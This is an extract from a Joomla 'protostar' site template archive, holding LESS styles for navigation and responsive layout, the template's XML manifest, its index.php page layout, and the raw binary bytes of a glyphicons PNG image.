.pull-left.item-image {
	margin:0 20px 18px 0;
}
.header .nav > li:last-child > .dropdown-menu,
.item-actions .dropdown-menu,
.item-comment .dropdown-menu {
	left:initial;
	right:0;
}
.article-index {
	margin:0 0 10px 10px;
}
/* List */
.list-item-title {
	margin-bottom:9px;
}
.list-item-content {
	margin:18px 0;
}
.list-item-subtitle {
	margin-bottom:9px;
}
/* More Items */
.items-more,
.content-links {
	padding: 15px 0;
}
/* Breadcrumbs */
.breadcrumb {
	margin: 10px 0;
}
.breadcrumb > li,
.breadcrumb > .active {
   color: #515151;
}
/* mod_login */
#login-form {
	margin-top: 8px;
}
.add-on {
	+ #modlgn-username, + #modlgn-passwd {
		width: 132px;
	}
}
/* Caption fixes */
.img_caption .left {
	float: left;
	margin-right: 1em;
}

.img_caption .right {
	float: right;
	margin-left: 1em;
}

.img_caption .left p {
	clear: left;
	text-align: center;
}

.img_caption .right p {
	clear: right;
	text-align: center;
}

.img_caption  {
	text-align: center!important;
}

.img_caption.none {
	margin-left:auto;
	margin-right:auto;
}
/* New captions */
figure {
	display: table;
}
figure.pull-center,
img.pull-center {
	margin-left: auto;
	margin-right: auto;
}
figcaption {
	display: table-caption;
	caption-side: bottom;
}
/* Aside Subnavs */
#aside .nav .nav-child {
	border-left: 2px solid @tableBorder;
	padding-left: 5px;
}
/* Navigation Submenus */
// The dropdown menu (ul)
// ----------------------
.navigation {
	.nav-child {
		position: absolute;
		top: 95%;
		left: 0;
		z-index: @zindexDropdown;
		display: none; // none by default, but block on "open" of the menu
		float: left;
		min-width: 160px;
		padding: 5px 0;
		margin: 2px 0 0; // override default ul
		list-style: none;
		background-color: @dropdownBackground;
		border: 1px solid #ccc; // Fallback for IE7-8
		border: 1px solid @dropdownBorder;
		*border-right-width: 2px;
		*border-bottom-width: 2px;
		.border-radius(6px);
		.box-shadow(0 5px 10px rgba(0,0,0,.2));
		-webkit-background-clip: padding-box;
		 -moz-background-clip: padding;
		      background-clip: padding-box;

		// Aligns the dropdown menu to right
		&.pull-right {
			right: 0;
			left: auto;
		}

		// Dividers (basically an hr) within the dropdown
		.divider {
			.nav-divider(@dropdownDividerTop, @dropdownDividerBottom);
		}

		// Links within the dropdown menu
		a {
			display: block;
			padding: 3px 20px;
			clear: both;
			font-size: @baseFontSize;
			font-weight: normal;
			line-height: @baseLineHeight;
			color: @dropdownLinkColor;
			white-space: nowrap;
		}
	}
	.nav li {
		position: relative;
	}
	.nav > li:hover > .nav-child,
	.nav > li > a:focus + .nav-child,
	.nav li li:hover > .nav-child,
	.nav li li > a:focus + .nav-child {
		display: block;
	}
	.nav > li {
		&:before {
		  position: absolute;
		  top: 100%;
		  right: 0;
		  left: 0;
		  height: 6px;
		  content: '';
		}
	}
	.nav > li > .nav-child {
		&:before {
		  position: absolute;
		  top: -7px;
		  left: 9px;
		  display: inline-block;
		  border-right: 7px solid transparent;
		  border-bottom: 7px solid #ccc;
		  border-left: 7px solid transparent;
		  border-bottom-color: rgba(0, 0, 0, 0.2);
		  content: '';
		}
		&:after {
		  position: absolute;
		  top: -6px;
		  left: 10px;
		  display: inline-block;
		  border-right: 6px solid transparent;
		  border-bottom: 6px solid #ffffff;
		  border-left: 6px solid transparent;
		  content: '';
		}
	}
	.nav li li .nav-child {
		top: -8px;
		left: 100%;

		&:before {
			position: absolute;
			top: 9px;
			left: -7px;
			display: inline-block;
			border-top: 7px solid transparent;
			border-right: 7px solid rgba(0, 0, 0, 0.2);
			border-bottom: 7px solid transparent;
			content: '';
		}
		&:after {
			position: absolute;
			top: 10px;
			left: -6px;
			display: inline-block;
			border-top: 6px solid transparent;
			border-right: 6px solid #ffffff;
			border-bottom: 6px solid transparent;
			content: '';
		}
	}
}

// Hover state
// -----------
.navigation .nav-child li > a:hover,
.navigation .nav-child li > a:focus,
.navigation .nav-child:hover > a {
  text-decoration: none;
  color: @dropdownLinkColorHover;
  background-color: @dropdownLinkBackgroundHover;
  #gradient > .vertical(@dropdownLinkBackgroundHover, darken(@dropdownLinkBackgroundHover, 5%));
}

// Category collapse
.categories-list .collapse {
	margin-left: 20px;
}
@media (max-width: 480px) {
	.item-info > span {
		display:block;
	}
	.blog-item .pull-right.item-image {
		margin:0 0 18px 0;
	}
	.blog-item .pull-left.item-image {
		margin:0 0 18px 0;
		float:none;
	}
}
@media (max-width: 768px) {
  /* Fix ios scrolling inside boottrap modals */
	body {
		-webkit-overflow-scrolling: touch;
		padding-top: 0;
	}
	.header {
		background:transparent;
	}
	.header .brand {
		float:none;
		display:block;
		text-align:center;
	}
	.header .nav.pull-right,
	.header-search {
		float:none;
		display:block;
	}
	.header-search form {
		margin: 0;
	}
	.header-search .search-query {
		width: 90%;
	}
	.header .nav-pills > li > a {
		border: 1px solid @tableBorder;
		border-bottom:0;
		margin:0;
		-webkit-border-radius: 0;
		-moz-border-radius: 0;
		border-radius: 0;
		margin-right: 0;
	}
	.header .nav-pills > li:first-child > a {
		-webkit-border-radius: 4px 4px 0 0;
		-moz-border-radius: 4px 4px 0 0;
		border-radius: 4px 4px 0 0;
	}
	.header .nav-pills > li:last-child > a {
		-webkit-border-radius: 0 0 4px 4px;
		-moz-border-radius: 0 0 4px 4px;
		border-radius: 0 0 4px 4px;
		border-bottom:1px solid @tableBorder;
	}
	.modal.fade {
		top:-100%;
	}
	.nav-tabs {
		border-bottom: 0;
	}
	.nav-tabs > li {
		float: none;
	}
	.nav-tabs > li > a {
		border: 1px solid @tableBorder;
		-webkit-border-radius: 0;
		-moz-border-radius: 0;
		border-radius: 0;
		margin-right: 0;
	}
	.nav-tabs > li:first-child > a {
		-webkit-border-radius: 4px 4px 0 0;
		-moz-border-radius: 4px 4px 0 0;
		border-radius: 4px 4px 0 0;
	}
	.nav-tabs > li:last-child > a, .nav-tabs > .active:last-child > a {
		-webkit-border-radius: 0 0 4px 4px;
		-moz-border-radius: 0 0 4px 4px;
		border-radius: 0 0 4px 4px;
		border-bottom:1px solid @tableBorder;
	}
	.nav-tabs > li > a:hover {
		border-color: @tableBorder;
		z-index: 2;
	}
	.nav-tabs.nav-dark > li > a {
		border: 1px solid @grayDark;
	}
	.nav-tabs > li:last-child > a, .nav-tabs > .active:last-child > a {
		border-bottom:1px solid @grayDark;
	}
	.nav-tabs.nav-dark > li > a:hover {
		border-color: @grayDark;
	}
	.nav-pills > li {
		float: none;
	}
	.nav-pills > li > a {
		margin-right: 0;
	}
	.nav-pills > li > a {
		margin-bottom: 3px;
	}
	.nav-pills  > li:last-child > a {
		margin-bottom: 1px;
	}
	.form-search > .pull-left,
	.form-search > .pull-right {
		float:none;
		display:block;
		margin-bottom:9px;
	}
}
@media (max-width: 980px) {
	.navbar-fixed-top {
		margin-bottom:0!important;
	}
	.item-comment .item-image{
		display:none;
	}
	.well {
		padding: 10px;
	}
}
@media (max-width: 979px) {
	.nav-collapse.in.collapse {
		overflow: visible;
		height: 0;
		z-index: 100;
	}
	.nav-collapse .nav > li.active > a {
		color: #fff;
	}
	.nav-collapse .nav > li.active > a:hover {
		color: #555;
	}
}
@media (min-width: 768px) and (max-width: 979px) {
	#login-form .input-small {
		width: 62px;
	}
}
// Page break
dl.tabs {
	float: left;
	margin-bottom: -1px;
}
dl.tabs dt.tabs {
	float: left;
	margin-left: 3px;
	padding: 4px 10px;
	background-color: #F0F0F0;
	border-top: 1px solid #CCC;
	border-left: 1px solid #CCC;
	border-right: 1px solid #CCC;
}
dl.tabs dt:hover {
	background-color: #F9F9F9;
}
dl.tabs dt.open {
	background-color: #FFF;
	border-bottom: 1px solid #FFF;
}
dl.tabs dt.tabs h3 {
	margin: 0;
	font-size: 1.1em;
	font-weight: normal;
}
dl.tabs dt.tabs h3 a {
	color: #0088CC;
}
dl.tabs dt.tabs h3 a:hover {
	color: #005580;
	text-decoration: none;
}
dl.tabs dt.open h3 a {
	color: #000;
	text-decoration: none;
}
div.current dd.tabs {
	margin: 0;
	padding: 10px;
	clear: both;
	border: 1px solid #CCC;
	background-color: #FFF;
}

/*Print pop-up*/
#pop-print {
	float: right;
	margin: 10px;
}

/*Code white space*/
code {
	white-space: pre-wrap;
}

/*Search filter*/
#filter-search {
	vertical-align: top;
}

/*Fix for editor buttons having a stupid height*/
.editor {
	overflow: hidden;
	position: relative;
}

/* Com_search highlighting */
.search span.highlight {
	background-color:#FFFFCC;
	font-weight:bold;
	padding:1px 0;
}

/* Com_search break long titles & text */
dt.result-title {
	word-wrap: break-word;
}

dd.result-text {
	word-wrap: break-word;
}

/* Prevent scrolling on the parent window of a modal */
body.modal-open {
  overflow: hidden;
  -ms-overflow-style: none;
}

/* Align fields for the profile display */
#users-profile-custom label {
	display: inline;
}

/* Remove unneeded space between label and field in vertical forms */
.controls > .radio:first-child,
.controls > .checkbox:first-child {
	padding-top: 0;

	.form-horizontal & {
		padding-top: 5px;
	}
}

/* Align btn-group to label */
.form-horizontal .controls > .radio.btn-group:first-child {
	padding-top: 0;
}

/* Corrects the modals padding */
.field-media-wrapper .modal .modal-body {
	padding: 5px 10px;
	overflow: hidden;
}
/* Getting rid of scroll bar in smartsearch Advanced search */
#search-results {
	clear: both;
}
#finder-filter-window {
	overflow: visible;
}
#finder-search .in.collapse {
	overflow: visible;
}

/* Fix for select element overflow on browser resizing */
.well {
	select,
	.chzn-container {
		max-width: 100%;
	}
}

/* Component pop-up */
.container-popup {
	padding: 28px 10px 10px 10px;
}
li {
	word-wrap: break-word;
}

ul.manager .height-50 .icon-folder-2 {
    height: 35px;
    width: 35px;
    line-height: 35px;
    font-size: 30px;
}
/* Popover minimum height - overwrite bootstrap default */
.popover-content {
    min-height: 33px;
}

/* Smart search select field margin */
.finder-selects {
    margin: 0 15px 15px 0;
}

/* mod_search in position-0 */
.header-search .mod-languages ul {
	margin: 0 0 5px 0;
	}
@import "template_rtl.less"; // Specific for rtl. Always load last.PK!A�Ŏ�protostar/templateDetails.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE install PUBLIC "-//Joomla! 2.5//DTD template 1.0//EN" "https://www.joomla.org/xml/dtd/2.5/template-install.dtd">
<extension version="3.1" type="template" client="site">
	<name>protostar</name>
	<version>1.0</version>
	<creationDate>4/30/2012</creationDate>
	<author>Kyle Ledbetter</author>
	<authorEmail>admin@joomla.org</authorEmail>
	<copyright>Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.</copyright>
	<description>TPL_PROTOSTAR_XML_DESCRIPTION</description>
	<files>
		<filename>component.php</filename>
		<filename>error.php</filename>
		<filename>offline.php</filename>
		<filename>favicon.ico</filename>
		<filename>index.php</filename>
		<filename>templateDetails.xml</filename>
		<filename>template_preview.png</filename>
		<filename>template_thumbnail.png</filename>
		<folder>css</folder>
		<folder>html</folder>
		<folder>images</folder>
		<folder>img</folder>
		<folder>js</folder>
		<folder>language</folder>
		<folder>less</folder>
	</files>
	<positions>
		<position>banner</position>
		<position>debug</position>
		<position>position-0</position>
		<position>position-1</position>
		<position>position-2</position>
		<position>position-3</position>
		<position>position-4</position>
		<position>position-5</position>
		<position>position-6</position>
		<position>position-7</position>
		<position>position-8</position>
		<position>position-9</position>
		<position>position-10</position>
		<position>position-11</position>
		<position>position-12</position>
		<position>position-13</position>
		<position>position-14</position>
		<position>footer</position>
	</positions>
	<languages folder="language">
		<language tag="en-GB">en-GB/en-GB.tpl_protostar.ini</language>
		<language tag="en-GB">en-GB/en-GB.tpl_protostar.sys.ini</language>
	</languages>
	<config>
		<fields name="params">
			<fieldset name="advanced">
				<field 
					name="templateColor" 
					type="color" 
					label="TPL_PROTOSTAR_COLOR_LABEL"
					description="TPL_PROTOSTAR_COLOR_DESC" 
					class="" 
					default="#08C"
				/>

				<field 
					name="templateBackgroundColor" 
					type="color" 
					label="TPL_PROTOSTAR_BACKGROUND_COLOR_LABEL"
					description="TPL_PROTOSTAR_BACKGROUND_COLOR_DESC" 
					class="" 
					default="#F4F6F7"
				/>

				<field 
					name="logoFile" 
					type="media" 
					label="TPL_PROTOSTAR_LOGO_LABEL"
					description="TPL_PROTOSTAR_LOGO_DESC" 
					class="" 
					default=""
				/>

				<field 
					name="sitetitle"  
					type="text" 
					label="JGLOBAL_TITLE"
					description="JFIELD_ALT_PAGE_TITLE_LABEL"
					default=""
					filter="string" 
				/>

				<field 
					name="sitedescription"  
					type="text" 
					label="JGLOBAL_DESCRIPTION"
					description="JGLOBAL_SUBHEADING_DESC"
					default=""
					filter="string" 
				/>

				<field 
					name="googleFont"
					type="radio"
					label="TPL_PROTOSTAR_FONT_LABEL"
					description="TPL_PROTOSTAR_FONT_DESC"
					class="btn-group btn-group-yesno"
					default="1"
					>
					<option value="1">JYES</option>
					<option value="0">JNO</option>
				</field>

				<field 
					name="googleFontName" 
					type="text" 
					label="TPL_PROTOSTAR_FONT_NAME_LABEL"
					description="TPL_PROTOSTAR_FONT_NAME_DESC" 
					class="" 
					default="Open+Sans"
					showon="googleFont:1" 
				/>

				<field 
					name="fluidContainer"
					type="radio"
					label="TPL_PROTOSTAR_FLUID_LABEL"
					description="TPL_PROTOSTAR_FLUID_DESC"
					class="btn-group btn-group-yesno"
					default="0"
					>
					<option value="1">TPL_PROTOSTAR_FLUID</option>
					<option value="0">TPL_PROTOSTAR_STATIC</option>
				</field>
			</fieldset>
		</fields>
	</config>
</extension>
PK!ՌD�ssprotostar/index.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/** @var JDocumentHtml $this */

$app  = JFactory::getApplication();
$user = JFactory::getUser();

// Output as HTML5
$this->setHtml5(true);

// Getting params from template
$params = $app->getTemplate(true)->params;

// Detecting Active Variables
$option   = $app->input->getCmd('option', '');
$view     = $app->input->getCmd('view', '');
$layout   = $app->input->getCmd('layout', '');
$task     = $app->input->getCmd('task', '');
$itemid   = $app->input->getCmd('Itemid', '');
$sitename = htmlspecialchars($app->get('sitename'), ENT_QUOTES, 'UTF-8');

if ($task === 'edit' || $layout === 'form')
{
	$fullWidth = 1;
}
else
{
	$fullWidth = 0;
}

// Add JavaScript Frameworks
JHtml::_('bootstrap.framework');

// Add template js
JHtml::_('script', 'template.js', array('version' => 'auto', 'relative' => true));

// Add html5 shiv
JHtml::_('script', 'jui/html5.js', array('version' => 'auto', 'relative' => true, 'conditional' => 'lt IE 9'));

// Add Stylesheets
JHtml::_('stylesheet', 'template.css', array('version' => 'auto', 'relative' => true));

// Use of Google Font
if ($this->params->get('googleFont'))
{
	$font = $this->params->get('googleFontName');

	// Handle fonts with selected weights and styles, e.g. Source+Sans+Condensed:400,400i
	$fontStyle = str_replace('+', ' ', strstr($font, ':', true) ?: $font);

	JHtml::_('stylesheet', 'https://fonts.googleapis.com/css?family=' . $font);
	$this->addStyleDeclaration("
	h1, h2, h3, h4, h5, h6, .site-title {
		font-family: '" . $fontStyle . "', sans-serif;
	}");
}

// Template color
if ($this->params->get('templateColor'))
{
	$this->addStyleDeclaration('
	body.site {
		border-top: 3px solid ' . $this->params->get('templateColor') . ';
		background-color: ' . $this->params->get('templateBackgroundColor') . ';
	}
	a {
		color: ' . $this->params->get('templateColor') . ';
	}
	.nav-list > .active > a,
	.nav-list > .active > a:hover,
	.dropdown-menu li > a:hover,
	.dropdown-menu .active > a,
	.dropdown-menu .active > a:hover,
	.nav-pills > .active > a,
	.nav-pills > .active > a:hover,
	.btn-primary {
		background: ' . $this->params->get('templateColor') . ';
	}');
}

// Check for a custom CSS file
JHtml::_('stylesheet', 'user.css', array('version' => 'auto', 'relative' => true));

// Check for a custom js file
JHtml::_('script', 'user.js', array('version' => 'auto', 'relative' => true));

// Load optional RTL Bootstrap CSS
JHtml::_('bootstrap.loadCss', false, $this->direction);

// Adjusting content width
$position7ModuleCount = $this->countModules('position-7');
$position8ModuleCount = $this->countModules('position-8');

if ($position7ModuleCount && $position8ModuleCount)
{
	$span = 'span6';
}
elseif ($position7ModuleCount && !$position8ModuleCount)
{
	$span = 'span9';
}
elseif (!$position7ModuleCount && $position8ModuleCount)
{
	$span = 'span9';
}
else
{
	$span = 'span12';
}

// Logo file or site title param
if ($this->params->get('logoFile'))
{
	$logo = '<img src="' . htmlspecialchars(JUri::root() . $this->params->get('logoFile'), ENT_QUOTES) . '" alt="' . $sitename . '" />';
}
elseif ($this->params->get('sitetitle'))
{
	$logo = '<span class="site-title" title="' . $sitename . '">' . htmlspecialchars($this->params->get('sitetitle'), ENT_COMPAT, 'UTF-8') . '</span>';
}
else
{
	$logo = '<span class="site-title" title="' . $sitename . '">' . $sitename . '</span>';
}
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1.0" />
	<jdoc:include type="head" />
</head>
<body class="site <?php echo $option
	. ' view-' . $view
	. ($layout ? ' layout-' . $layout : ' no-layout')
	. ($task ? ' task-' . $task : ' no-task')
	. ($itemid ? ' itemid-' . $itemid : '')
	. ($params->get('fluidContainer') ? ' fluid' : '')
	. ($this->direction === 'rtl' ? ' rtl' : '');
?>">
	<!-- Body -->
	<div class="body" id="top">
		<div class="container<?php echo ($params->get('fluidContainer') ? '-fluid' : ''); ?>">
			<!-- Header -->
			<header class="header" role="banner">
				<div class="header-inner clearfix">
					<a class="brand pull-left" href="<?php echo $this->baseurl; ?>/">
						<?php echo $logo; ?>
						<?php if ($this->params->get('sitedescription')) : ?>
							<?php echo '<div class="site-description">' . htmlspecialchars($this->params->get('sitedescription'), ENT_COMPAT, 'UTF-8') . '</div>'; ?>
						<?php endif; ?>
					</a>
					<div class="header-search pull-right">
						<jdoc:include type="modules" name="position-0" style="none" />
					</div>
				</div>
			</header>
			<?php if ($this->countModules('position-1')) : ?>
				<nav class="navigation" role="navigation">
					<div class="navbar pull-left">
						<a class="btn btn-navbar collapsed" data-toggle="collapse" data-target=".nav-collapse">
							<span class="element-invisible"><?php echo JTEXT::_('TPL_PROTOSTAR_TOGGLE_MENU'); ?></span>
							<span class="icon-bar"></span>
							<span class="icon-bar"></span>
							<span class="icon-bar"></span>
						</a>
					</div>
					<div class="nav-collapse">
						<jdoc:include type="modules" name="position-1" style="none" />
					</div>
				</nav>
			<?php endif; ?>
			<jdoc:include type="modules" name="banner" style="xhtml" />
			<div class="row-fluid">
				<?php if ($position8ModuleCount) : ?>
					<!-- Begin Sidebar -->
					<div id="sidebar" class="span3">
						<div class="sidebar-nav">
							<jdoc:include type="modules" name="position-8" style="xhtml" />
						</div>
					</div>
					<!-- End Sidebar -->
				<?php endif; ?>
				<main id="content" role="main" class="<?php echo $span; ?>">
					<!-- Begin Content -->
					<jdoc:include type="modules" name="position-3" style="xhtml" />
					<jdoc:include type="message" />
					<jdoc:include type="component" />
					<div class="clearfix"></div>
					<jdoc:include type="modules" name="position-2" style="none" />
					<!-- End Content -->
				</main>
				<?php if ($position7ModuleCount) : ?>
					<div id="aside" class="span3">
						<!-- Begin Right Sidebar -->
						<jdoc:include type="modules" name="position-7" style="well" />
						<!-- End Right Sidebar -->
					</div>
				<?php endif; ?>
			</div>
		</div>
	</div>
	<!-- Footer -->
	<footer class="footer" role="contentinfo">
		<div class="container<?php echo ($params->get('fluidContainer') ? '-fluid' : ''); ?>">
			<hr />
			<jdoc:include type="modules" name="footer" style="none" />
			<p class="pull-right">
				<a href="#top" id="back-top">
					<?php echo JText::_('TPL_PROTOSTAR_BACKTOTOP'); ?>
				</a>
			</p>
			<p>
				&copy; <?php echo date('Y'); ?> <?php echo $sitename; ?>
			</p>
		</div>
	</footer>
	<jdoc:include type="modules" name="debug" style="none" />
</body>
</html>
PK!R��8181&protostar/img/glyphicons-halflings.pngnu&1i��PNG


IHDR����0�IDATx�	l\׹�O��DI���DqF\�3"g˥��ɱi-)��ME���R��,�b1��cXNd'HTO��g
�yz���^�D�(��Uy�$l�A�Ul��}=�\~��ͽ�;�Մts�39C�Ϝ9�{��_�s������I^���G��9	�Ia@��3X��g�U�KϪgb
q�n�&yQ��l����c��T_���AGr�{��m%�2R��@�W�C�,gh�J����[t=l�����LA7����@V�jڞ:��l��3��U��~NJa@�丑�Z��x����U���[IN���IK}�0�IV�TE����c{�]���c:�Cx�@u3�?R�lj��Q� a=x kУ�a��Q!BY��**�;�bj���U�Lw�;uȦ������W��уnh[0i��+��)6z4�OrB�P��+��hZh�g� -=��C3dS��Yh}Y�T���)P����N��Z/�C�C���Ǻ�
X�����z�)��<뺾>P�B�8��F�;����׎�8yz�*����- ��=�z�K��v&���v�MD��bH<+A�I��{σ���gP��7�[tr�Js��'�Uan���FooU�|�!�CJ��P��@������	�Ǻ��I4*�¢��*'o�Z����]�Rz��X���S{Ѭh�S{�o�c��EhE�����=��[�"/��B`��YȊ(�{�����{�f�x�ys��O��V�rتP�eV�s��=��2*�k�6_�л�W��-��ȚR�H���7��S��	q�'N��B�0A����l��^�]�w�̡Yeg�=���T\ͬ�y��U��펡�q�L���Q�}$ڪ����h���N,{���^w�(|���'��P����뉥��>��Σ�b�Z�g��Q�%-�L�����?��;�b��Rc_��~I����֟��ώA4\��?��U�N,�"��Y�ި��Zu�K,�*�a�ڀ�k�������-/�7��y*�Ȝ�H
�;1�'f�����I�x����A*�Jݸ���l��Ǽ��Ue!�Ѝ+�$oTb�64�O�����x���-����#&��k��^��/�`�z��¿ߞ�.��W����]���/4#P���_�`�¢Y��W�5�5!��`�ddGVQe2c����#/^z�x��s
�����=���x�B�J�Q�z��kՎs��dv��F_��~��O�|�Ǻ�
���1�P2]OX��4�"n��#��A���S�*KAJ{��PR9'�3sC7��F�֦��5*�f���S\W!p7�S�[�vuQ�������尼J��W����|�

ka���~��F_�H펫u���O~ك����^�`�˓BO`R�9��W��9·-T��q���Y��d��qq�S�=���B|�F�Y�G4+~��ww�T���I������e��I��}�ș�q�C�V�o���HKGn=�U�b���Z��s /.*
�bN�M���O�[�YiqV�Yzn�U��('fG�v\:����-�eE?�N�]l�d��n^���.�F���N�h=�o�M�7}�[�Bd����Q��;���\ն�q��k�#q��[��N�u�A��_o����'V�A(�>:272��(����*��9W���':�=������7�~PD(G����ٱ�k�c|WA���@un�R~`���F_/�"E4��q	��U�rc��d�wQ��^�e���:LM��V���45Mu��֪�F��;~�Y�U��A�Vч�}�柯ZA���s;ٷ՞��,��	h���r4u���s�d����c}Km����2-��xH�� �C�p��������p8�UgU����p8�UgU����p8�U����J$�c�!d@��b$V89)/b2��>iO	��
P4�תN��ӏK1^��\WG���+�壾�Iy�H����N=u`R����k�-&����H�B����fVi|��S�j�jo5&9���҇g�g��킇j�b_K}������>+ҍ�����Q��`D�k��]�B����QE�z�ݐS`��\z��@�
��h|]pQ*G��FEȬ�V��:2�!�0xz������
�~����c�7�clU�X��2t(x�Og�����UK����v(������U��{�����І�T�ꟃ=���w��rze�Ɛ>i�On�F��4��L?�[5dT2��U
��Q��XEh�������=6*�@�4���A}���1�'���%�A��A�>!}�wJ��^��M����	����ͦV�Z E�A^_��y���4,^#�������m8w ��w#���3Է-�&�.��I�8|��z+�*UcV�U�˾1g�����qA�;~�>g��� ��Y�����Ъ��|}H/�3��7��c�C$�<�~�[D�G��6��]�Ϸ?	^ԝ��t-y=%�g��x�׳�]]C�2v!�n�tJ�8�MnМ��1�$������~.�ç�ӝ���!�"�V%�Z�5Йl99�T=.g5��}��
��2�f���A��0����mԷ�-�������X�7<�<'�	꓇6-��x��*��Q��0%(�x�Z��zX�xH��
S�Ё�r�����=���B�O����
�tY���e�U!���я��[H��ꑭ�9��P�Z4b# �������#�P/��zH@?�_=�껕j��=b	;uw�Y�><�o�6��J���^��b�׌{V���&��6�׃���Ͱ>������1��b���Ws��"(C���>�B�V����>�Y����Y�c?�P!�?O�X����>x�����^R�1zT�@ҚgX�����c��S�>ȕ��ڑG�!\�ƣ�ʭ*�F�8r~�G��gzF��$�kS���Y}dGTYe��%����V�#��qIj3@Mp77ڞcZ��*��[nU���{t��`R/�{/nT�����F��)9��T�T��	�OM��Mrӵ�M��|����f�!P����p�-i���*$����1z��1z��}`Oş��-Т�ǧn�޷ލ�{
!}�_����W8����-0Ur˭j��*Nj���!��5M��8V6�L�)H񹯁��S=Ҵ�@�I��˷ϭ������)񔩾Σ�'�Q'������}��o,��N�ti�?{�#�������DԚ�#M~�	�*X��Y�>�y���_q�� \�����h��{ê�A����_��)��*�R){9M���Zߠ�͜����; ����ez�Ï8���U�rV{nR��ώų�sL��}W��}���[u���
��9^?v��w\2Ϲ�a4��{����,+"�������GU4��
D�h&#����Z>g�O@�ϛ� �*G׾>�J_������v}���1-߲���A�|a	�~�Far���I��K��]��p8�UgU����p8�UgU����p8�UgU����p8�J �S�Q_Q�����Zi�
i1�N`�m������[@؜=�����x�c�x����`Ѱ2[^�j}�x��>.���r�!�"�����컔F��o;v�#C��kh9p҃��nəl����iŊ,
+8*i}�1�'���G������ѓ��9S���ܬy(A[��n�U1�$Pg�g�
��W�`ӍM�Ï؄fXw��A�o{�}��� ��C]����|<v�M#��
��'��(h�=ј�>��򺰊9���Ga�K�3r)��74k��n�U�
��`ND^��&B�q�H懣��K '�ff]�Yf�~I�_:������.6kFc����)߂�x��>�(6�Ѱ�!�ʮ���=+B��E����R�Iϛ��VE�a�g�G/��]%�a��<>�K}&"����}��L" �:�B�(V�[�qw
�u��w�������A�!��Uъ���Yၟt,�0�gѪc�R�Iϛ��V%u�e���M&TSӳc�cS���ߡ��1���t�����
��Oi	Y��ň`��U�S5 ~�F&��ka��P�`3�D����{r�[ʨx��l�Y2vf�c�U�j���chD}�wl�'zqd�;q��?��ŭ��Z�Ѓ��Up���U��!?�=���Po�ڧj�W~��O���d@V�e�jO*�^$bh�-/0�ӿgB
��ǁZ_F�F���"�տ}T��j��c{������2)d!����D�_4@��l�O%�wʃm'�	�U��a8�V&�h��Y�`��>��2��X{{����l�Ge����|^�Y�.h�C���-/DekU������U��~�]�yF�d�;4e�.��-���>���_����}'8VjU9�Z~S̼%l����4�NJ��k�,�&�ۘ��Yh}+
���^�Yɨ�Yy��Ъ~N~�h�X��1y�; �J����fa���
;.y����
$q���]?�K��)���J�ڱ��;����ܭ�5��*�*Sk��t�EĈ�w�m�K�DX��jjT2�ƨ�U��*HpC����G0D�3
��+L�0q���'���_x����C���耒�ƒ̗���B��� ��0)Q���Q	���Wت>�U��8}ؓF$���Ԩ��$�ܪ:=��:$�f��0L>S���J�����IGx@�}h��v9��V�����i�e4RҦ�R2��V�	*��	�m}X�Z�Y�̪Ɛ�2�27��T$����[+R���V�dm��ۏFe�%�Q�¤=iӃ���	�Jo����R�b�z�AШ�G'�'w���pVu8�U�����pVu8�U����p8�:gU��YU6Q�*s�t8B���D�?N�2��tQ}M���*�Uy]^$=�p7�q)VD��T�Q�U�6w�Q�^9��JtCN}u����J�UK�C��I�Iǫt�c�T��*a�9�d�䰁�"&X��v;jP/����A��V�e�����F��B��I�"8��i�J�F|�W�Օ�7bDM�2;64?�栈GNfC��T�B�,sŤJ�QZ�=H׉���*�ȣy�,B���#�7*�tA�l�m빡���N�U��"�
 �jO���}�S{�QV��+@��Š��c[兆-=�b�/B
�Y�e �#�U(�ٴ�b���	��\K`+fMjD`�����,����z�|Eij�ghT�w�ͺ�g�Dr2�k�+W��pzQ�a'���x������)�|i3��\���UNbVv�&����p�	���ńb(Ed�&V%�%�e�Lfl[0�3��.��l�LC����^�iO:���B��*=���7ޮ�-�T�ώSr�q����\ ����o�}S�)�����mT�AzLX�,,v�3m"�@?#��N����S^�M�jO*��
�JZ㣬� %H�bx��J]�3�F����N�iOC���>c%(=�0�`��W]�t9
��}Uh�A����cOA�դd�P����:��>�TNiG��������˙汞�
j�ߍ�Px@��̄��|�"��Q��J����l5�J]���z�V:��=���1��Q��/��ÐG��3��[�>^5�)6�l��Մ>�a��A�ͳ�wA/��SӐ�;��UKн�ܺ��s�`'� ifUҚ�v��3V�rA2u�j�5�́�H=_+�r��/��l3V��_��Q��{Q���b�ک{N�8�~]Y���E9��;<h�P�����o��2�Ĺ�Т�����S{��dT]��6\z;'�l귽�UIkzԥ�Z=c%�����*4�ݪ��3B"�|�l��F*D�_��*�%�W\Z�x�¨H�ĬĞ
4�k'��A�K��򤈣�����[��I���i��x��4Ȋ�z�G���DL�(啎�=�ĸ73����(HX� jw��p���Vž�'�z�V6Z��%ퟵ1k%��
P����Q���-���V�24��I5	���y�W�+����'	�S	)h���Tc@�Az�g
���|�Hmח֪~ڃ�%�:��QVz�8��"��V��j4�D�Z�j�^oV֨5�n�
}<c?�8��������e����6��ɨ����l�f!�ap�8�Ïz���zHc���z��TeTzf��!��Q�z��2��A+du�J��Ĩ�gke��LPD��-?��:!B&q������spB8p홇��0tjzd��:pmǥ�i�e�i8������U�iԪ�=qG� y��#�n��y�2u.��КE*�$
���h��u���]e��QI��o?^�cr����f��o�탶Zi�~�KaP�{�Rz �Gk��ެп,yw�*뉌¸��S�-�FzJ/^,�s�P~Ɵ@��:�f������'+8�:�X�Z����.-w8�U�����pVu8�U�����pVu8�U�����j��G���z���>IU��u�a��X����Y�9���[>���OO�Y�4�=�R��ׯ>�W��zE6Y�Z �����}v�I��3�x���[��'���^�dEz��
�ש|��ե��p�5��vj�{������Y�~j��?!��m��5f�A�ϊ��J_��7�g��d�%�K���B�y���-�|Yh[b�&��)���%=a�G����|m�мM���8��f��1z�׋��鹉���SO�/赔{���mBq'�|��PN���F/]7���m�8e��5�3��u�è*��!J�̧�d��0B�'m�zf���V��Q�Y���/��ܱY�͵�^��9��'L�}�ڵw��f��jV>��{�"���N�h�7��Tp�GdS~ZP��z��F����=VgC�{֨��s�����
